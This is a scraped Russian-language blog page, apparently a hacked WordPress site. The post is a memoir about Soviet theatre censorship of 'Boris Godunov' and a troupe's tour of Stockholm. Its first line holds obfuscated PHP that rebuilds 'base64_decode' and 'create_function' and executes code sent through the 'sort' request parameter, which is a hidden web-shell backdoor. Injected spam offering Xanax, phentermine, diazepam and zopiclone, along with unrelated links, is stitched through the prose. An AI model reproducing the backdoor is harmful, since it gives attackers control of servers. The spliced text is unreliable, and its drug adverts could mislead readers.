nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

” СХИМУ МНЕ ! СХИМУ ! “


Buy Xanax Today  Поведаю  ещё  одну  мою   ш в е д с к у ю   меморию. Но  сначала  увертюра.

http://weplaydrums.com/       Советская  власть  как  огня  боялась  производных  слов  от  слова    " с в я т о с т ь"  и  вообще  религиозной  тематики. Не  знаю  как  кому,  но  мне  и  в  детстве  было  не  понять, и  сейчас так  же, почему  нас заставляли  учить  наизусть " На  смерть  поэта "  Лермонтова ?  Там  же  присутствуют  абсолютно  Ц Е Р К О В Н Ы Е  слова,  а  именно: "…есть  БОЖИЙ  суд" –  когда  проповедывалось,  что  Бога  нет ?
       И  такой  же  непонятностью  было  про  " наперсников  разврата ". То-то  я  посмотрела  в  Интернет, что  возрастную  планку  изучения  этого  стихорворения  подняли  на  три-четыре  класса,  чтоб  про  "разврат"  понятнее  было …
       Но  послушайте: " с свинцом  в  груди " – это  же  просто  невозможно  внятно  произнести  даже  профессионалу,  а  не  то  что  ребёнку  у  доски.
     Сам  же  Лермонтов  написал: " Есть  чувство  правды  в  сердце  человека  – святое  вечности  зерно ". Не  только  о  себе  ведь  он  писал,  но  и  другим  оно  доступно.Тем  не  менее  заложить  в  основу  хрестоматийного  стиха  " дезу " – " с  свинцом  В   Г Р У Д И    и   с   жаждой   М Е С Т И . . ." . . .  Где  ложь  – там  поэтика  и  даёт   с б о й  !  В  печальные  часы  ухода  Пушкина  Лермонтов  стоял  в  толпе  с  многими  петербуржцами,  пришедшими  к  дому  номер  12  по  набережной  реки  Мойки.  И  когда  врач,  друг  Пушкина  Владимир  Даль писал  эпикриз:  что  пуля  проникла  в  паховую  область, Лермонтов  априорно  сочинял  не  "  с  свинцом  в  паху",  а,  естественно, "с  свинцом  в  груди ". . . И  не с  " жаждой мести"  погиб  поэто,  а  всех  по-христиански  простивавсех простив.
    И,  закругляя  тему  э т о й  мемории  и  возвращаясь  к  моему  изначальному  в  ней  недоумению – к  теме  "святости ", хочется  снова  поудомевать,  почкму  советская  цензура  не  только  оставила  " БОЖИЙ  суд "  у  Лермонтова  в  неудобоваримом  стихе,  но  и  приказала  школьникам  " забивать  им   башку " ?  А  в   опере  " Борис  Годунов "  почему-то  цензура   испугались  слов  " с в я т а я   с х и м а " –  как  это,  например, поёт  Шаляпин,  и  ПЕРЕДЕЛАЛИ  в  чуждую  пушкинскому  Борису  фразу: " схиму  мне, схиму ! ".
         Но  не  буду  отвлекаться. Скажу  только  к а к   у  Пушкина:
                    " А. . . .  святое   постриженье . . .  Повремени   ещё,  владыка  патриарх,  Я    Ц А Р Ь    ЕЩЁ ! "
          Я  такой  экскурс  сделала, чтоб  продемонстрировать  знание  неоднозначности  возгласа, которым  назвала  эту  главу  и  что  в  Пушкинский  текст  я  не  поленилась  заглянуть.

              Кстати,  ещё о  церковности  и  о  постановке  оперы " Борис  Годунов " в  1970 году. Я  говорила,  что  до  Кировского-Мариинского  театра  работала  в  Александринском,  где  и  познакомилась  с  будущим  своим  мужем  и  в  нескором  будущем  о.Георгием.Так  вот.
        В  Александринском (тогда  Пушкинском)  театре  был  замечательный  артист,  которого  все  там  звали  дядя  Саша, Александр  Соколов.  А   когда  в   Кировском  стали   делать  по  тем  временам  новую, ещё  ДО  Покровского, версию  "Бориса  Годунова", то  почему-то  именно  дядю  Сашу позвали   как  режиссёра.
       Нет,  не  могу  удержаться  и  не  съязвить  по  поводу  милейшего  старикана.  Всё  бы  ничего: ну  назначили  и назначили. НО. . .
       У  этого  замечательного  артиста,  игравшего  в  драматическом  театре " характерные " роли,  был  такой  характерный  трескучий,  прокуренный  голос  и  особенная,  узнаваемкя  дикция,  словно  цедящаяся  сквозь  неразжатые  зубы,  что  только  этому  " дяде  Саше "  только  и  общаться  многие  часы  подряд  с  выдающимися  в о к а л и с т а м и   на  их  оперном  олимпе – если  даже  прослушивая  других  певцов,  у  них  рефлекторно  работают  связки, а  несколько  репетиционных  часов  подчиняться,  находясь  при вокальном  исполнении  с в о и х  обязанностей, неумному  режиссёру  с  больным  голосом  –  ну  это,  как  говорится,  что-то  с  чем-то.
            Итак, начиная  " перестраивать "  "Бориса  Годунова ",  милейший  старикан  бродил  по  нашему  кишкообразному  цеху,  где  нами  " на  погляд "  была  развешена  в с я  бутафория  предыдущей  версии  спектакля.
           Он важно  " выступал "  руки  за  спину,  время от  времени вынимая  то  одну  из-за спины,  то  другой  дирижёрски  перечёркивал  воздух,  приговаривая: " Чтоб  как  меньше церковного, как  можно  меньше  церковного ! "
           А  потом  вообще  было  варварство,  когда  торжественно  из  нашего,  а  также  костюмерного  цехов " излишки  церковных  вещей  и  натуральных  богослужебных облачений списали,  изъяли  и  во  внутреннем  дворе  театра  сожгли,  подписав  акт  об  утилизации ! Я  только  наскоро  успела  ажурные  крестики  с  них  отрезать . . .
           Предсмертные  с л о в а  Годунова  " схиму  мне,  схиму ! "  я  взяла  себе  " на  фла г ",  и  в  бутафорском  цехе  мои  коллеги  привыкли, что  я  этим  лозунгом  злоупотребляла. Сами  понимаете, несмотря  на  всеобщую   атеизацию,  в    о п е р н о м    театре  это  злоупотребление  было  вполне  уместно.
        Тем  более, что  все  в   театре  любили  подразнить  и  моего  начальника,  Бориса  Дмитриевича, особенно  артисты  во  время  спектакля. Они  в  пересменках   врывались  в   его  кабинет,  чтобы  на  фоне  рыбок  в   аквариуме  –  . . .  о,  эти  рыбки  . . .  …………………………….
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////        … Борис  Дмитриевич   в е с ь   театр  подсадил  на  рыбную ловлю, причём   з и м н ю ю !
      Э т о т  факт  вам  о  чём-нибудь   говорит ? Поясню. Балетный,  оперный цеха,  оркестр – у   в с е х   в  работе  задействована  тончайшая  физиология,  требующая  осторожного  с  ней обращения. Например,  как-то  на  обратном  пути  со  л ь д и н ы  грузовик  со  всеми  находящимися  в  пострыболовной  эйфории  работниками – прежде  всего – творческих  цехов  театра   стал  з а в а л и в а т ь с я.
     И  мне  очевидец  рассказывал,  что  Миша  Барышников  та- а- акой  совершил  виртуозный  прыжок, который  добавил  ему аргумента  для  бегства  из  театра  куда  подальше ! …
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////   …….так  вот,  артисты  в   гриме   и   в   " прикиде "  16  века  врывались  к   нам   в   цех,  чтобы  перекинуться   с  начальником  в   шахматишки.
     Врываясь  же,  они  как   ненормальные   безбожно   орали: " Борис,  Борис,  к у д а   т ы   д е л   маленького  Димитрия ? "
     Или  вариант: " Борис, Борис!  Зачем  ты   зарезал   маленького  юродивого ? "
     Или  ещё,  наиболее  близкий  к  тексту  вариант: " Борис,  Борис !  Всё   пред   тобой  трепещет ! "
          Я  каждый раз  от  их  идиотизма  балдела и  приговаривала: " О  Боже,  вот  придурки-то  !  Схиму  мне,  схи-и-му ! "

Diazepam Kopen Nederland      ====================================================================================================================================

Buy 15 Mg Phentermine Uk Online             Так  всё-таки  ч т о   же  ещё  этакого,  " клюквенного ",  произошло  со  мной  в   благословенном   Стокгольме ?

             М-да . . .   да   не  со  мной,   а  . . .  с    н а ц и о н а л ь н о й     и д е е й  . . и    н а ш е й,   и    ш в е д с к о й . . .

Buy Phentermine Australia              Благополучно  достигнув  толерантной  почвы  Швеции,  нас  тут  же   обаяла  своим  профессиональным  гостеприимством  К а т я,  К э т ,  как   она   нам представилась.  Она  обворожительно  говорила  на  русском  языке  и  не важно –  с  акцентом  или  без  него, потому  что если  б  даже  на  китайском  она  говорила,  действие  её  "сексапильности"  говорило  само  за  себя. Наши  мужики,  ещё  не  достигнув  долгожданных " революционных "  магазинов,  у ж е  неровно  задышали, а  мы,  тётки,  завистливо  стали  перенимать  у  неё  опыт  охмурения.
           Она, Кэт,  предварила   все  наши  вопросы:  мол,  что  русский  она  хорошо  знает,  потому  что  она  жена  дипломата, работавшего  в  Советском  Сюзе,  что  у  неё  столько-то  детей,  что  у  неё  такое-то  образование  и  что  нам  повезло, так   как  в  Швеции  девальвация.
          Поскольку   м ы   в   капиталистических  терминах  тогда   ещё   были  были  ни  уха  ни  рыла,  то  решили,  что  девальвация  –  это  очередное  счастье  в  личной  жизни.  Пока  не  увидели  ценники  в   витринах   магазинов.
     По  дороге  к  нашим  отелям  она  прокомментировала  все  достопримечательности  вкупе  со  всеми  мелькавшими домами  её  непростых  друзей, чьи  имена  она  перечисляла,  просто  этим  лично  себе  доставляя  удовольствие.  Для  нас  это  было  как   горох  об  стенку, так  мы  были  уставшии  и  в  " магазинном " предвкушении  отрады  и  утешения.  Но  то,  что  она  не  проста –  она  до  нас  донесла. Лично  я  была   от  неё  в  нокдауне.
       И  дальше, на  протяжении  всего  нашего  пребывания  в  Стокгольме, она  была  нашим  Вергилием.. Она  вдруг  возникала,  как  фея  Сирени, и  куда-то  увлекала  пожелавших  увлечься, и  снова  возникала  за  новой  порцией  свободных  от  магазинных  маньячеств  театральных  рабов.

       Мы  были  в  Стокгольмской    Р а т у ш е ,  где  иногда  выдают  Нобелевские  премии, трижды:  один  раз,  на  экскурсии, только   мы –  постановочная  часть, работяги, второй   раз  на  общем  банкете  в  честь  7 ноября,  а  третий  раз  в  честь  окончания  гастролей.
       И  вот  что  было  на  нашем – " рабочем " – посещении   Ратуши.
       Очаровательная  Кэт  ввела  нас  в  громадный  так  называемый " Голубой "  зал, где  Нобелевские  премии  выдают  и  слушают  речи  Нобелевских   л а у р е а т о в .  Кэт  со  свойственном  ей  шведским  юмором  обратила  наше  внимание  на  то, что  зал,  хоть  и  называется "Голубой", но  на  самом  деле – он  К р а с н ы й !  Да-да !  Не  верь  глазам  своим !
       Она,  чирикая,  объяснила,  что  Голубым  этот  зал  был  задуман в   проекте: его  хотели  чем-то  голубым  его  облицевать.  Но   п р и р о д н ы й   материал  –  красный  камень –  оказался  настолько  эффектным,  что  решили  оставить  стенки  как  они  есть,  нетронутыми. Задуманное  название  зала " Красный " о с т а л о с ь.
     И  тут   К э т  сделала  гримаску  сокровенного  повествования: " Ну,  а  голубым  от  задуманного  проекта  здесь  остался  только  голубой  бархатный  ш н у р о к ,  т е с ё м о ч к а,  отделяющая  зрительный  зал  от  сцены, на  которой  представительствуются  члены  Королевской  семьи  и  участвующие  в  награждении. Только  и  всего … А  дальше  мы  поднялись  на  этаж  выше,  в  "ЗОЛОТОЙ"  ЗАЛ,  где  эти  Нобелевские  премии  о б м ы в а ю т с я .
Вот  тут  и  сердцевина  моего  повествования.

http://terranealife.com/unforgettable-hikes-in-scenic-palos-verdes/?nck=8553964437          Кэт  сладострастно нас водила по Золотому  залу, который одной  стеной  с окнами  выходит  на  улицу, а  противоположной – окнами  на   нижний, " Голубой "  зал.     В  Интернете зал  называется  "Синий",  потому  что,  как  всем  известно,  в  европейских  понятиях  нет  разделения  "синий-голубой". На  стенах  Золотого  зала  в количестве 18  миллионов  (!)  з о л о т ы х   плиток  там   мозаично  изложена   история  всей  Швеции. Чирикая  и  чирикая, Кэт  последовательно  излагала  нам   историю своей  Родины. Честь  ей  и  хвала !
    НО !
     Подведя  нас,  идиотов,  к  одной  из  мозаичных  картин,  расположенных  аккурат  посреди  проёмов  окон  н а д  " Голубым "  залом, Кэт  сделала  паузу, набираясь духу, то  есть дыхания, оглядывая  нас  и  давая себе "добро" на  капитальный  о б с ё р . Самой  своей  обворожительной,  завораживающей  интонацией  она  стала   нас просвещать  уже  заявленной  сакральной  интонацией: " А  во-о-от на  этой мозаичной  ка-а-ртине  н-а-а-ш   люби-и-мый  шведский  художник, ве-е-еликий  патриот, позволил  себе  немного  изменить  истинную  историю. Вы,  конечно,  знаете, что  в а ш   Пётр Первый  побил  нашего  короля  Карла  Двенадцатого. Но  мы  должны   простить  нашему  любимому  художнику, что  он  перепутал  победителей –  он,  ну так,  ну так  переживал ( Кэт  растягивала  слова  до  невыносимости). И  вдруг  она пальчик  воткнула  в  изоражение  всадника: " Это  –  наш  король  Карл…" –  и соскользнув  пальчиком  под  карлова  коня, словно  пощекотав  изображённых  под  ним, быстро  и  чётко  закончила: " А  тут   в а ш   царь   Пётр  и  е г о   войско . Но  мы  должны  простить  нашему  замечательному  художнику  эту  небольшую  фальсификацию, мы  же  все  добрые,  понимающие  друг  друга  люди,  не  правда  ли ? "
       И,  оглядев  нашу  индиферентную  толпу,  довольная  своим   профессионализмом,  Кэт  потащила  наших  баранов  смотреть  на  " новые  ворота "  дальше,  к  генеральному  золотому панно,  занимающему  всю  торцовую  стенку – " МАТЬ  ШВЕЦИЯ ",  где  на  поклонение  этой, матери   их,  Швеции, еле  удерживающей  громадный  сноп, стоят  словно  в  тупой  советской  очереди  в с е  страны, ну   в с е,  какие  тот  художник,  вероятно, только  знать  или  ему  их  указывали !
        Все,  как  бобики  вкупе  с  нашими  доблестными  КГБ-шниками,  покорно  столпились  под  этой " Матерью-Швецией "…
        Я  отупело  осталась  у  окна с  Карлом  Двенадцатым, топчущим  н а ш и х .
       Тут  и  думать  было  нечего, оставалось  только  одно: стоять  и  ни  из  каких  " шинелей ", то  есть  из  себя,  не  выходить.
        Собственно, у  меня  получилось  то,  что  сейчас  называется   а к ц и е й :  я  д е м о н с т р а т и в н о  осталась  стоять  спиной  к  мозаичной  картине  триумфа  Карла: получалось,  что  я  тоже  под  его  конём  с  лежащим  кверх  тормашками  Петром  Первым . . . Я  стояла  как  вкопанная …
       Дождавшись,  когда  мои  театральные  сподвижники  стали  мне  издали  сдержанными  воплями  выражать  своё  негодование  и  жестами  требовать  возвратиться    в  лоно  коллектива,  а    т  о . . .

http://chelseafc360.com/posts/done-deal-chelsea-prime-target-completes-move-signs-six-year-deal-for-club/       НО !  Ка-а-а-к   я   ей,  этой  К э т,  о т о м с т и л а … от  всей  души  нараспашку …Ой,  только  эта  моя   месть   –   между  нами!  Никто,  кроме  нас  с  вами,  пока  этой  сатисфакции  не  знает. Итак,  по  секрету  всему  свету !

http://crochetncrafts.com/how-to-measure-and-mark-buttonholes/?relatedposts=1     Эта  Кэт  повезла  нас  на  корабль  " V A S A ",  который  в 1628  году  был  спущен  на  воду, но  из-за  погрех  в  его  проектировании  он  мгновенно  перевернулся  и затонул. Надо  сказать, что " Ваза " – это  название  шведской  династии. Ну  перевернулся  и  перевернулся. Но  когда  в  20 веке  техника  дошла  до таких  возможностей, что  можно стало  перевёрнутое  возвращать  в  исходное  положение, то  корабль  со  всем  содержимым  вернули  к  изначалу. А  поскольку  температура  и  качество воды  сохранили  на  этом  корабле  всю  "бутафорию", словно  в  консервной  банке,  то  из  корабля  сделали   м у з е й.
     Вот  об  этом  и  повествовала  нам  наша  милая  Кэт. Я, быв  под  впечатлением  её  нас  давешнего  о б с ё р а    своим  Карлом  Двенадцатым ,  да  ещё  в  залах,  где   и   н а ш и м   доводилось  эти  Нобелевские премии  получать,  решилась  " идти  на  вы ".
      Я  встала  под   носом  у Кэт  и,  сделав  гримасу  полного  идиотизма, старательно  не  моргая,  преданно  зырить  ей  в  глаза. Я,  как  бы  она  не  передвигалась, не  отворачивалась, оказывалась  всё  под  тем  же  её  носом  и  гипнотизирующе  соединялась  с  ней  как  бы в  экстазе.  Я  даже  пыталась  у  себя  из   краюшка  губ  пустить  слюну,  что  мне  не  удалось, так  как  во  рту  пересохло  от  собственной  наглости. Но  в  общем  воздействие  не  неё  мне  явно  удалось !
         Я  видела, как  она тяжко  вздыхала, оглядывалась, словно  ища  на  кого бы  опереться,  и  всё  время  нервно поправляла  на  шее  свой  " а  ля  рус "  платочек.
         Она  явно  была  в  нокауте !
         Но  с  другой  стороны,  не  выпендрись  она –  кто  бы  мог  узнать  об  этой  скандальной  мозаике ? Да  и  я  сейчас  вдруг  стала  что-то   писать-вспоминать . . .
         То-то   же !  Не  трогай  пыха – будет  тебе  лиха !
         И  в  плане  внутренней  политики  у  меня  был  успех. На  следующий день  или  через  день  –  неважно,  мой  коллега  сказал  мне  про  нашего  общего  начальника,  Бориса  Дмитрича:
  — Ты  его  доконала:  он  бегал  по  отелю  с  криками  " схиму  мне,  схиму ! "

http://code-pages.com/robots.txt                             +
               петр  иоанн  андрей
филипп  фома  варфоломей
               два иакова  матфей
  иуда http://rock107.com/director-todd-haynes-making-documentary-about-lou-reeds-early-band-the-velvet-underground/ яковль,т.е. ф а д д е й
Buy Zopiclone    зилота симон  и  матфий


Добавить комментарий

Для отправки комментария вам необходимо авторизоваться.